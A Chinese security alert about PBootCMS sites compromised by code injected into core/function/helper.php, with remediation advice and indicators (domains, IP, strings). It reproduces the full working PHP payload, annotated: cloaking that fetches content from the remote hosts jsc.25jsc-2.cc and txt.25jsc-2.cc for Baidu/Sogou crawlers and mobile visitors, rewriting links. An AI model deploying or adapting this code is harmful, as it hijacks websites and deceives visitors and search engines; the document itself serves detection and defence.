开源达人近期发现的 PBootCMS 漏洞：core\function\helper.php 被注入恶意 curl 引流代码

开源达人近期发现一起针对 PBootCMS 的攻击：黑客利用 PBootCMS 的文件读写权限漏洞入侵网站，向程序中注入恶意代码，通常写入 core\function\helper.php 文件。该代码通过 PHP 的 curl 函数从境外服务器（IP 184.164.93.198，地址 http://txt.25jsc-2.cc:82/、http://jsc.25jsc-2.cc:81/ 等端口）拉取内容，在被入侵的网站上伪装成 404 页面发布内容。从下方代码可以看到，该脚本只在访问者 User-Agent 为百度/搜狗爬虫时才返回拼接了远程内容、所有链接被改写为随机地址的页面；移动端浏览器访问特定 URL 时则直接输出远程服务器 502.php 的内容；普通桌面访客看到的仍是正常页面，因此站长往往难以察觉。这给各大使用 PBootCMS 的网站带来极大安全隐患，请各位站长注意防范：加强 PBootCMS 站点的读写权限控制（网站目录尽量只读部署，仅必要目录可写），防止注入及跨站；检查 core\function\helper.php 等核心文件是否被篡改（可在全站文件中搜索上述域名、IP 或 "25jsc" 字符串）；加强服务器安全管理，及时维护更新；发现问题后及时向中央网信办（国家互联网信息办公室）违法和不良信息举报中心全国互联网安全信息服务平台投诉。
<?php
// NOTE(review): this listing is the injected payload described in the post above
// (reported as planted in core/function/helper.php). It is reproduced for analysis
// only — do not deploy or execute it. The comments describe what the visible code does.

// Rebuild this site's scheme://host from server variables. HTTPS is assumed when the
// HTTPS server variable is set and not "off", or the server port is 443. HTTP_HOST
// comes from the client's Host header, so it is attacker-influenced.
 $protocol2 = (!empty($_SERVER[‘HTTPS’]) && $_SERVER[‘HTTPS’] !== ‘off’ || $_SERVER[‘SERVER_PORT’] == 443) ?
“https://” : “http://”;
$host2 = $_SERVER[‘HTTP_HOST’];
$fullUrl2 = $protocol2 . $host2;                      // scheme://host, no path
$url2 = $_SERVER[‘HTTP_HOST’] . $_SERVER[‘REQUEST_URI’]; // host + path/query, no scheme
set_time_limit(30);
error_reporting(0);   // silences every PHP error/warning — failures leave no trace in logs
$tr2 = “stristr”;     // assigned but never used in the visible code
$er2 = $_SERVER;      // copy of $_SERVER, read by the define() calls further down
/**
 * Fetch a URL over cURL (GET) and return the response body.
 *
 * Side effects: sends a Content-Type header on every call, and disables TLS
 * certificate and hostname verification, so anything fetched over https can
 * be swapped by an on-path attacker. Redirects are followed. The visitor's
 * User-Agent is read into $ua2 but not used; a fixed UA is sent instead
 * (compare httpGet3, which forwards the visitor's UA).
 *
 * @param string $url2 URL to request
 * @return string|false response body, or false when curl_exec fails
 */
function httpGet32($url2) {
  // Response content type for the page this function's output ends up in
  header(‘Content-Type:text/html;charset=utf-8’);
  // Start a cURL session
  $ch = curl_init();
  // Visitor's User-Agent: read here but unused in this function
  $ua2 = $_SERVER[‘HTTP_USER_AGENT’];
  // cURL options
  curl_setopt($ch, CURLOPT_URL, $url2);
  curl_setopt($ch, CURLOPT_USERAGENT, ‘MyCustomUA/1.0’);  // fixed UA string
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);       // no certificate verification
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);       // no hostname verification
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);        // follow redirects
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);           // return the body instead of printing it
  curl_setopt($ch, CURLOPT_HEADER, 0);                   // body only, no response headers
  // Perform the request; false on failure (errors are silenced by error_reporting(0) above)
  $output = curl_exec($ch);
  // Release the handle
  curl_close($ch);
  return $output;
}
/**
 * Fetch a URL over cURL (GET) and return the response body, forwarding the
 * visitor's User-Agent.
 *
 * Differs from httpGet32 in two ways: the request carries the visitor's own
 * User-Agent (below, this is how the crawler's UA reaches the remote server),
 * and redirects are not followed. TLS certificate and hostname verification
 * are disabled here too, and a Content-Type header is sent on every call.
 *
 * @param string $url2 URL to request
 * @return string|false response body, or false when curl_exec fails
 */
function httpGet3($url2) {
  // Response content type for the page this function's output ends up in
  header(‘Content-Type:text/html;charset=utf-8’);
  // Start a cURL session
  $ch = curl_init();
  // Visitor's User-Agent, passed through to the target server
  $ua2 = $_SERVER[‘HTTP_USER_AGENT’];
  // cURL options
  curl_setopt($ch, CURLOPT_URL, $url2);
  curl_setopt($ch, CURLOPT_USERAGENT, $ua2);             // forward the visitor's UA
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);       // no certificate verification
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);       // no hostname verification
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);           // return the body instead of printing it
  curl_setopt($ch, CURLOPT_HEADER, 0);                   // body only, no response headers
  // Perform the request; false on failure (errors are silenced by error_reporting(0) above)
  $output = curl_exec($ch);
  // Release the handle
  curl_close($ch);
  return $output;
}
// Query-string prefix for the rewritten links in the crawler branch that handles
// URLs outside the "area" list (links become "?moban/<random>.html").
$dir=”?moban”;
/**
 * Build a pseudo-random string of $length characters.
 *
 * Character set selected by $type:
 *   0  -> digits only (array_pop drops the alphanumeric entry, leaving the digit set)
 *   1  -> digits
 *   2  -> lowercase letters plus digits
 *  -1  -> both sets concatenated (digits appear twice, so they are over-weighted)
 * Any other value indexes $arr directly and is not handled specially.
 * Uses rand(), which is fine for fabricating link names but is not a CSPRNG.
 * Below, the script calls this to invent spam-looking ".html" link targets.
 *
 * @param int $length number of characters to produce (default 5)
 * @param int $type   character-set selector as listed above (default 0)
 * @return string the generated string
 */
function char($length = 5, $type = 0)
{
    $arr = array(1 => “0123456789”, 2 => “abcdefghijklmnopqrstuvwxyz0123456789”);
    // Pick the character set for $type
    if ($type == 0)
    {
        array_pop($arr);
        $string = implode(“”, $arr);
    } elseif ($type == “-1”) {
        $string = implode(“”, $arr);
    } else {
        $string = $arr[$type];
    }
    // Draw $length characters with replacement
    $count = strlen($string) – 1;
    $code = ”;
    for ($i = 0; $i < $length; $i++) {
        $code .= $string[rand(0, $count)];
    }
    return $code;
}
// Path prefix for the rewritten links in the crawler + "area" branch: the first one or
// two segments of the current URI plus "/moban". get_url2() is defined just below;
// PHP hoists unconditional function definitions, so the call is valid here.
$dir2=get_url2().’/moban’;
/**
 * Derive a short path prefix from the request URI.
 *
 * Collapses repeated slashes, splits the path on "/", and returns "/<first>"
 * when the last segment ends in .php/.html/.xml/.asp/.ppt/.shtml, otherwise
 * "/<first>/<second>" (or the whole path when it has two segments or fewer).
 * Reads REQUEST_URI as-is: the query string is not stripped first, so a query
 * containing "/" or ending in one of those extensions changes the result.
 *
 * @return string path prefix beginning with "/"
 */
function get_url2() {
    $url2 = $_SERVER[‘REQUEST_URI’];
    $url2 = preg_replace(‘~/+~’, ‘/’, $url2);  // collapse runs of "/" into one
    // Split into path segments
    $parts = explode(‘/’, trim($url2, ‘/’));
    // Last segment looks like a file: keep only the first segment
    if (preg_match(‘/\.(php|html|xml|asp|ppt|shtml)$/’, end($parts))) {
        // File path: return the first directory segment
        $url2 = ‘/’ . $parts[0];
    } else {
        // Not a file path: keep at most the first two segments
        if (count($parts) > 2) {
            $url2 = ‘/’ . $parts[0] . ‘/’ . $parts[1];
        } else {
            $url2 = ‘/’ . implode(‘/’, $parts);
        }
    }
    return $url2;
}
// Request facts captured as constants ($er2 is the $_SERVER copy made above).
define(‘url’, $er2[‘REQUEST_URI’]);        // request path + query string
define(‘ref’, $er2[‘HTTP_REFERER’]);       // Referer header (defined but not used below)
define(‘ent’, $er2[‘HTTP_USER_AGENT’]);    // User-Agent header, used for the crawler check
// Remote content server named in the post above; the crawler branch fetches
// site . REQUEST_URI from it. A stable literal, usable as a detection signature.
define(‘site’, “http://jsc.25jsc-2.cc:81/”);
 define(‘url8’, $fullUrl2);                // this site's scheme://host
// Patterns used to strip the real homepage's <title>, charset meta, keywords and
// description before it is appended to the remote content (presumably so the
// remote content's own title/meta are what the crawler indexes).
$title = ‘/<title>(.*?)<\/title>/i’;
$meta = ‘/<meta charset=”.*?>/i’;
$key = ‘/<meta\s+name=”keywords”\s+content=”([^”]+)”\s*\/?>/i’;
$miaoshu = ‘/<meta\s+name=”description”\s+content=”([^”]+)”\s*\/?>/i’;
define(‘road’,$_SERVER[‘REQUEST_URI’]);    // same value as url
// Cloaking trigger: requests whose User-Agent matches Baidu's or Sogou's crawler
// (case-insensitive). Ordinary browsers never enter the crawler branch.
define(‘regs’, ‘@baiduspider|Sogou@i’);
// URL selector: true when the request URI contains any of these substrings
// (stristr is case-insensitive). Entries such as "and", "no", "ga" and "wap"
// (listed several times) make this match a large share of URLs, not only
// template or document paths.
define(‘area’, stristr(url, “moban”)  or stristr(url, “moban”)  or stristr(url, “xml”)  or stristr(url, “doc”)  or
stristr(url, “pdf”)  or stristr(url, “txt”)  or stristr(url, “ppt”)  or stristr(url, “pptx”)  or stristr(url, “xls”)  
or stristr(url, “xlsx”)  or stristr(url, “wap”)  or stristr(url, “edu”)  or stristr(url, “gov”)  or stristr(url,
“wap”)  or stristr(url, “asp”)  or stristr(url, “gq”)  or stristr(url, “pdx”)  or stristr(url, “ga”)  or stristr(url,
“tacc”)  or stristr(url, “work”)  or stristr(url, “csv”)  or stristr(url, “sports”)  or stristr(url, “sleep”)  or
stristr(url, “life”)  or stristr(url, “88art”)
 or stristr(url, “advice”) or stristr(url, “wap”) or stristr(url, “moban”) or stristr(url, “and”) or stristr(url,
“no”) or stristr(url, “world”) or stristr(url, “school”) or stristr(url, “tips”) or stristr(url, “auto”));
// Cloaking branch: only User-Agents matching the Baidu/Sogou crawler regex get here.
// Every other visitor skips this block entirely and sees whatever the enclosing
// page renders, which is why the infection is hard to spot from a desktop browser.
if (preg_match(regs, ent)) {
    // Crawler on a URL containing one of the "area" substrings: serve the remote
    // server's content, followed by a stripped copy of this site's homepage, with
    // every link rewritten to a fabricated path.
    if (area) {
      // Canonical link built from host + URI ($url2 carries no scheme) and a fixed,
      // malformed HTML comment; both literals are stable and usable as detection signatures.
      echo ‘<link rel=”canonical” href=”‘.$url2.'” />’ ;
   echo ‘<!-184-194-phpjc-kw-526–>’;
        //echo httpGet3(site.road).httpGet32(url8);
         // This site's own homepage (scheme://host), fetched with the fixed UA
         $html2 = httpGet32(url8);
         // Remote server content at the same path as the crawler's request,
         // fetched with the crawler's own UA forwarded
         $html = httpGet3(site . road);
        // $html = httpGet32(url8)
  // Strip headings, title, meta and document wrappers from the local copy so it
  // can be appended as a fragment below the remote content.
  // remove </h1>
$html2 = str_replace(‘</h1>’, ”, $html2);
// remove <h1>
$html2 = str_replace(‘<h1>’, ”, $html2);
// remove <meta charset ...>
$pattern6 = $meta;
$replacement6 = ”;
$html2 = preg_replace($pattern6, $replacement6, $html2);
// remove the description meta tag
$pattern5 = $miaoshu;
$replacement5 = ”;
$html2 = preg_replace($pattern5, $replacement5, $html2);
// remove the keywords meta tag
$pattern4 = $key;
$replacement4 = ”;
$html2 = preg_replace($pattern4, $replacement4, $html2);
// remove <title>...</title>
$pattern3 = $title;
$replacement3 = ”;
$html2 = preg_replace($pattern3, $replacement3, $html2);
// remove </head>
$html2 = str_replace(‘</head>’, ”, $html2);
// remove <head>
$html2 = str_replace(‘<head>’, ”, $html2);
// remove a bare <html> tag (tags with attributes are not matched)
$pattern2 = ‘/<html>/i’;
$replacement2 = ”;
$html2 = preg_replace($pattern2, $replacement2, $html2);
// remove "body class=...>" (note: the leading "<" is left in place by this pattern)
$pattern8 = ‘/body class=.*?>/i’;
$replacement8 = ”;
$html2 = preg_replace($pattern8, $replacement8, $html2);
// remove a bare <body> tag
$pattern7 = ‘/<body>/i’;
$replacement7 = ”;
$html2 = preg_replace($pattern7, $replacement7, $html2);
// Remote content first, stripped local homepage after
$html = $html.$html2;
        // Every <a ...>...</a> in the combined document (the opening tag must sit on
        // one line: ".*?" has no "s" modifier)
        $lianjie = ‘/<a .*?>[\s\S]*?<\/a>/’;
        preg_match_all($lianjie,$html, $aarray5);
        // preg_match_all($lianjie, $html2, $aarray5);
        if ($aarray5[0]) {
            foreach ($aarray5[0] as $pbti) {
                // Replace the anchor's href with a fabricated path under $dir2:
                // six digits + 4–10 alphanumerics + ".html" (see char())
                $preg = ‘/href=(\”|\’)(.*?)(\”|\’)/i’;
                $replacestr = ‘href=”‘ . $dir2 . ‘/’ . char(6, 1) . char(mt_rand(4, 10), 2) . ‘.html’ . ‘”‘;
                $ahtml = preg_replace($preg, $replacestr, $pbti);
                // str_replace over the whole document, so identical anchors elsewhere change too
                $html = str_replace($pbti, $ahtml, $html);
                //  $html2 = str_replace($pbti, $ahtml, $html2);
            }
        }
        echo $html;
      exit();
    }
    // Crawler on any other URL: fetch this site's own page for the requested URI,
    // drop <h1> tags, and rewrite every link to "?moban/<random>.html".
    else {
     $html=httpGet32(url8.url);
    //  echo(url8.url);
// remove </h1>
$html = str_replace(‘</h1>’, ”, $html);
// remove <h1>
$html = str_replace(‘<h1>’, ”, $html);
// Same anchor pattern as above
$lianjie = ‘/<a .*?>[\s\S]*?<\/a>/’;
preg_match_all($lianjie,$html,$aarray5);
if($aarray5[0]){
   foreach ($aarray5[0] as $pbti){
      $preg = ‘/href=(\”|\’)(.*?)(\”|\’)/i’;
// Fabricated link target relative to the current page: ?moban/<digits><alnum>.html
$replacestr = ‘href=”‘.$dir.”/”.char(6,1).char(mt_rand(4,10),2).’.html’.'”‘;
$ahtml=preg_replace($preg, $replacestr,$pbti);
$html= str_replace($pbti, $ahtml, $html);
   }
}
echo $html;
 exit();
   }
}
        // Reached only by requests that did not match the crawler regex: flush any
        // buffered output before the mobile check.
        ob_flush();
        flush();
// Mobile visitors on an "area" URL: the response from the remote 502.php is streamed
// straight to the client (CURLOPT_RETURNTRANSFER is not set, so curl_exec prints the
// body), with the visitor's User-Agent forwarded, and the script then exits — so this
// remote content replaces whatever the page would have served. The pattern contains
// a literal line break after "Fennec|", so that alternative cannot match "wOSBrowser".
if (area && preg_match(‘/phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|
wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/’,$_SERVER[‘HTTP_USER_AGENT’])) {
$ua = $_SERVER[‘HTTP_USER_AGENT’];
$ch = curl_init();
// Target URL and options: plain http to the remote server named in the post above;
// the literal URL is a stable detection signature
curl_setopt($ch, CURLOPT_USERAGENT, $ua);
curl_setopt($ch, CURLOPT_URL, “http://txt.25jsc-2.cc:82/502.php”);
curl_setopt($ch, CURLOPT_HEADER, false);
// Execute: without CURLOPT_RETURNTRANSFER the remote body is written directly to the client
curl_exec($ch);
// Release the handle and stop — nothing after this runs for mobile visitors
curl_close($ch);
    exit();
   }
?>